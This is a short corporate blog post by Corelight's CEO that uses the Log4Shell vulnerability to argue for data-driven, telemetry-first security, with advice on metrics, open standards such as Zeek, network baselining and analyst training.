Last week I had the privilege to be in Washington, DC talking to a group of defenders. I heard a clear pattern of words: “data-driven,” “telemetry-first,” and “visibility”. The defenders were focused on having the right telemetry to investigate both routine incidents and advanced attacks, because (1) while they can add analytics later, they can’t recreate the DATA that those analytics depend on, and (2) better coverage reduces the attacker’s ability to maneuver without hitting defensive telemetry. The defender’s dilemma (adversaries only have to get it right once) becomes the attacker’s dilemma (defenders only have to find one of their moves).
Then Log4jShell happened, which follows Sunburst as a prime example of why leading defenders pursue data-driven strategies. With such a wide range of exploit paths in Log4Shell, there is no one “detection.” The winning approach directly detects the most common exploit paths then relies on data - both in its raw form and fed into multiple, evolving analytics - to expose both new / less common exploit paths. More importantly, defenders can look back in time and see exploits that happened prior to disclosure. Without the right data, you are blind.
We see four elements of this strategy:
- Measure what matters. The three key metrics are mean time to respond, coverage of MITRE TTP’s through the combination of network and endpoint telemetry, and breadth of environmental coverage (i.e. ensuring that the entire enterprise is covered, not just key portions of it). All of this work must extend backwards in time as long as possible - 7 days of PCAP or 30 days of logs are insufficient.
- Use standards. Bespoke telemetry sources are hard to map to new hire skills, hard to integrate, and hard to analyze. By using open standards such as Zeek, which Corelight was first built on, you simplify the entire analysis stack by using existing industry-driven turnkey integrations. We see this in the Log4Shell response, where Zeek-based analytics come from companies ranging from Splunk to BlackHills, whose integration of detection and telemetry provides cleaner and easier responses.
- Do your own reconnaissance: know your own network, so you can quickly pivot to potential anomalies with an understanding of what is normal (i.e. baselined). For some organizations this is a dedicated threat hunting function, for others this can be part of a person’s time each week. Either way, it is an investment in insight and agility.
- Train, train, train. Great data is only as good as the people using it. Corelight (and others like Splunk) provide well structured CTF exercises. However, it is critically important to give analysts time after the training to put that to use, for example, with threat hunting assignments. Doing so helps the analyst understand their environment much better, accelerating future investigations.
With so many rushing to address the latest vulnerability, our investigation and remediation work today has to address the crisis at hand. However, leaders need to look at the implications of Log4Shell to better equip our teams for the next battle. Never waste a good crisis! Follow the lead of elite defenders and adopt data-driven security as a key pillar of your 2022 strategy.
By Brian Dye, CEO of Corelight
